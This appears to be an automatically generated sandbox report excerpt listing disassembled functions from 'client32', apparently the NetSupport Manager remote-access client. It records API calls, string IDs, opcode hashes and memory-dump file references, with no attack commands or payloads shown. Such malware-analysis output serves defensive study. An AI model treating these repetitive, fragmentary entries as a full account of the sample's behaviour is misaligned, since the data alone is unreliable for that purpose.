                                                                                        • API String ID: 199729137-2469634949
                                                                                        • Opcode ID: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                        • Instruction ID: 14daf5f2905bb7c6da6366d36066c9679ffc6904d36036c61edd8dc8337596d2
                                                                                        • Opcode Fuzzy Hash: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                        • Instruction Fuzzy Hash: 06F01C72A50628AFD714DFA4D948E9BB7E8FB54721F00852AFD5597A04C774F840CBA0
                                                                                        APIs
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        • CreateThread.KERNEL32(00000000,00000000,11027530,00000000,00000000,00000000), ref: 110297DE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread__wcstoi64
                                                                                        • String ID: *TapiFixPeriod$Bridge
                                                                                        • API String ID: 1152747075-2058455932
                                                                                        • Opcode ID: 3080b396092eeda8920bad3614523d6238ebb4cdc89e739b7f498256d61953c6
                                                                                        • Instruction ID: 741f43c1c8d280c886d6f15773e052eeed2c6ce1e0fea61ed055b6fa2ceaecb0
                                                                                        • Opcode Fuzzy Hash: 3080b396092eeda8920bad3614523d6238ebb4cdc89e739b7f498256d61953c6
                                                                                        • Instruction Fuzzy Hash: 24F0ED39B42338ABE711CEC1DC42F71B698A300708F0004B8F628A91C9E6B0A90083A6
                                                                                        APIs
                                                                                        • GetWindowTextLengthA.USER32 ref: 1115B8C3
                                                                                          • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                          • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                        • GetWindowTextA.USER32(750A670B,00000000,00000001), ref: 1115B8DD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: TextWindow$Length_malloc_memset
                                                                                        • String ID: ...
                                                                                        • API String ID: 2795061067-1685331755
                                                                                        • Opcode ID: 713777570d7c9697d218dfe7d24bc4d67ffae7820faad57aa0902fa453d29927
                                                                                        • Instruction ID: 4b1d5b0fb85ecc65756fa04cbc49f4114121db69e5f1a8b46b9f358c176aa325
                                                                                        • Opcode Fuzzy Hash: 713777570d7c9697d218dfe7d24bc4d67ffae7820faad57aa0902fa453d29927
                                                                                        • Instruction Fuzzy Hash: A5E0E565A041965FC2404639AA4898BFF59FB86208B044430F0B6D7105DA24E40987E0
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101D334
                                                                                        • SetLastError.KERNEL32(00000078), ref: 1101D351
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressErrorLastProc
                                                                                        • String ID: FlashWindowEx
                                                                                        • API String ID: 199729137-2859592226
                                                                                        • Opcode ID: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                        • Instruction ID: 7fa6031e8bb94c9d2945b427b42de2899da1a72ad2875e3a9dcb47a7bac4ba5f
                                                                                        • Opcode Fuzzy Hash: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                        • Instruction Fuzzy Hash: 83E01272A412389FD324EBE9A848B4AF7E89B54765F01442AEA5597904C675E8408B90
                                                                                        APIs
                                                                                        • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1
                                                                                        • m_hWnd, xrefs: 110010A6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 2046328329-2830328467
                                                                                        • Opcode ID: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                        • Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
                                                                                        • Opcode Fuzzy Hash: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                        • Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5
                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,?,?,?), ref: 11001083
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061
                                                                                        • m_hWnd, xrefs: 11001066
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 819365019-2830328467
                                                                                        • Opcode ID: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                        • Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
                                                                                        • Opcode Fuzzy Hash: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                        • Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0
                                                                                        APIs
                                                                                        • PostMessageA.USER32 ref: 11001113
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1
                                                                                        • m_hWnd, xrefs: 110010F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 906220102-2830328467
                                                                                        • Opcode ID: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                        • Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
                                                                                        • Opcode Fuzzy Hash: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                                        • Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0
                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,00001014,?,?), ref: 110151D4
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • m_hWnd, xrefs: 110151B6
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                        • API String ID: 819365019-3966830984
                                                                                        • Opcode ID: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                        • Instruction ID: 66f1678c741d69056f24fb38e5f1926d93c7d4e0e7c38f0779b183b432510f86
                                                                                        • Opcode Fuzzy Hash: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                                        • Instruction Fuzzy Hash: 26E08675A403197BD310DA81DC46ED6F39CDB45714F008025F9595A240D6B1B94087A0
                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • m_hWnd, xrefs: 11017206
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                        • API String ID: 819365019-3966830984
                                                                                        • Opcode ID: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                        • Instruction ID: ca461658ff4ad9fd457e958dedcd80386c4d58b841a73ce1d2056031be29817f
                                                                                        • Opcode Fuzzy Hash: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                                        • Instruction Fuzzy Hash: 54E0C275A80329BBE2209681DC42FD6F38C9B05714F004435F6196A182D5B0F4408694
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,?,?), ref: 11001BFF
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001BE1
                                                                                        • m_hWnd, xrefs: 11001BE6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitInvalidateLastMessageProcessRectwsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 2776021309-2830328467
                                                                                        • Opcode ID: 755a9776fea6f005391afbd423a88cadd0b6998a93535cd2b22780f3c32d3b99
                                                                                        • Instruction ID: f329f54fccfbd903c35ddfc7245e55534a92ffb2c11cbd1515618277d015e5d1
                                                                                        • Opcode Fuzzy Hash: 755a9776fea6f005391afbd423a88cadd0b6998a93535cd2b22780f3c32d3b99
                                                                                        • Instruction Fuzzy Hash: 6BE0C2B5A00329BBD300DA81DC82EE7F3ACFB482A4F00C03AFC2556200E7B0E940C7A0
                                                                                        APIs
                                                                                        • ShowWindow.USER32(?,?), ref: 1100114B
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131
                                                                                        • m_hWnd, xrefs: 11001136
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 1604732272-2830328467
                                                                                        • Opcode ID: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                                        • Instruction ID: 819250d5e51c5ae6cd1eebd62df6884d4c995cad7bb4673794d6e20848bff6e8
                                                                                        • Opcode Fuzzy Hash: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
                                                                                        • Instruction Fuzzy Hash: A0D02BB191032D7BC3048A81DC42ED6F3CCEB04365F004036F62656100D670E440C3D4
                                                                                        APIs
                                                                                        • KillTimer.USER32 ref: 1100102B
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                        • m_hWnd, xrefs: 11001016
                                                                                        Memory Dump Source
